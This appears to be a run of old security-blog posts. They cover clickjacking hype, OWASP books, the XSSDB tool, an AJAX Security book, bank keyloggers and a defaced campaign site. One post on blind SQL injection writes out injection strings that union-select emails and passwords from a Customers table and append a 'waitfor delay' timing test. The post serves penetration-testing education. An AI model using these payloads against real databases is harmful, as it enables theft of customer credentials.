This post has no technical value. Just experimenting with how much traffic I can get by putting the term “clickjacking” in a post. 
But seriously, if you want to know anything about it, go listen to Martin’s podcast interview with Jeremiah and Rsnake. You can also go over to Computerworld and take a look at the Q&A.
So…
clickjacking…
clickjacking…
clickjacking…
Rsnake
Robert Hansen
Jeremiah Grossman
Whitehat Security
SecTheory LLC
OWASP
Vet
I was recently involved in web application assessment and discovered something that I wanted to pass along. Keep in mind that this has probably been utilized before, but it is something that I just noticed so … I wanted to throw it out for your amusement.
To set the stage, I had been looking at this application for quite some time and had an idea that SQL Injection might exist, but I was having much difficulty determining if the injection was actually present. The application was catching errors, displaying 404’s, (etc) and really not displaying any good data to make a decision. So …. the question was … if the application is catching our errors and really not giving us anything to work with … how could we ask the question to the database to indicate if we were actually getting our requests processed by the database server?
Answer? Time.
Since the application is catching all of our attempts and not providing any good feedback the thought was … let’s come up with a way to have the database provide us an “indirect” response. To do this, I tried “waitfor”. WAITFOR specifies a time, time interval, or event that triggers the execution of a statement block, stored procedure, or transaction.
Syntax: WAITFOR { DELAY ‘time’ TIME ‘time’ }
To implement ‘waitfor’, simply tag it onto the end of the injection test you’re trying to accomplish. For example, if you’re injection string is:
30000′ union select 1,email,password from Customers –
By implementing ‘waitfor’, your string might appear as….
30000′ union select 1,email,password from Customers waitfor delay ‘0:0:30′ –
Keep in mind that while the injection results might not appear to your screen, you will experience a delay of the response back to the browser. The point here is to demonstrate that:
So, while our injection string might not render results to the screen, we can test that the database server is executing our injection strings.
An interesting download to come out of the OWASP camp — books are now available for your reading pleasure. The initial group of books are:
All are available free of charge (download versions) from LuLu.com/owasp.
So you don’t consider yourself to be XSS savy, but you would really like to do some free testing? Well look no farther…you just might have a solution. Introducing the XSSDB by GNUCitizen. The XSSDB (i’m assuming) is heading in the direction as the Metasploit Project, however, soley based on Cross-Site Scripting checks.
A couple of the nice[r] features (IMHO) of the database:
So how could this be improved? Personally, while I do have several methods of testing for XSS, I would find it invaluable to have an offline solution where I could test non-internet connected applications. GNU? Perhaps some type of offline solution with a update capability? The solution does take a bit of getting used to (for example, if you aren’t terribly familiar with how GET, POST and Parameters work in web applications), but overall …. a very nice solution.
Billy Hoffman and Bryan Sullivan released a new book on AJAX Security this last month (or so). For those of you who aren’t familiar with Billy and Bryan, they are/were involved in the SPI Dynamics group before being acquired by HP Software in late 2007. I would highly recommend that you grab a copy of this book for your library.
[Ripped from Amazon]
Billy Hoffman is the lead researcher for HP Security Labs of HP Software. At HP, Billy focuses on JavaScript source code analysis, automated discovery of Web application vulnerabilities, and Web crawling technologies. He has worked in the security space since 2001 after he wrote an article on cracking software for 2600, “The Hacker Quarterly,” and learned that people would pay him to be curious. Over the years Billy has worked a variety of projects including reverse engineering file formats, micro-controllers, JavaScript malware, and magstripes. He is the creator of Stripe Snoop, a suite of research tools that captures, modifies, validates, generates, analyzes, and shares data from magstripes.
Bryan Sullivan is a software development manager for the Application Security Center division of HP Software. He has been a professional software developer and development manager for over 12 years, with the last five years focused on the Internet security software industry. Prior to HP, Bryan was a security researcher for SPI Dynamics, a leading Web application security company acquired by HP in August 2007.While at SPI, he created the DevInspect product, which analyzes Web applications for security vulnerabilities during development. Bryan is a frequent speaker at industry events, most recently AjaxWorld, Black Hat, and RSA. He was involved in the creation of the Application Vulnerability Description Language (AVDL) and has three patents on security assessment and remediation methodologies pending review.
It’s simply amazing to me that folks will fall for the marketing literature. Hacker Safe? I think not….
It was just reported by SANS. Be careful if you go there.
Â
Vet
Martin McKeay posted a few days back about keylogging software on client’s of HSBC Bank. Bruce Schneier pointed out this article this morning about the same issue. Both came to roughly the same conclusion: this is ridiculous.
Yes, there are things the bank can do to help with this, but come one, where is the personal responsibility for the clients? Sheesh.
Vet
Politics can be fun, and it can be real ugly, and often both at the same time. And in this digital age, everyone has a chance to get involved, including script kiddies that have a political axe to grind. Go read the story here. But what got me about this whole deal was this quote from Dan Geary, who runs Lieberman’s site:
“This is a direct disruption of a federal campaign,” he said. “I have to see us go to an era where security is primary instead of the primary focus being new and innovative ways to get the message out.”
Uhhh, that deserves a big “duh”. Dude, you run the website. I am sure you are an activist and want to get Senator Lieberman re-elected, but running the website and securing the website is your job. Frankly, that quote sounds more like something a politician would say rather than a web admin. If you don’t know that you are going to be dealing this kind of stuff, then the good senator hired the wrong guy. Sheesh.
Vet
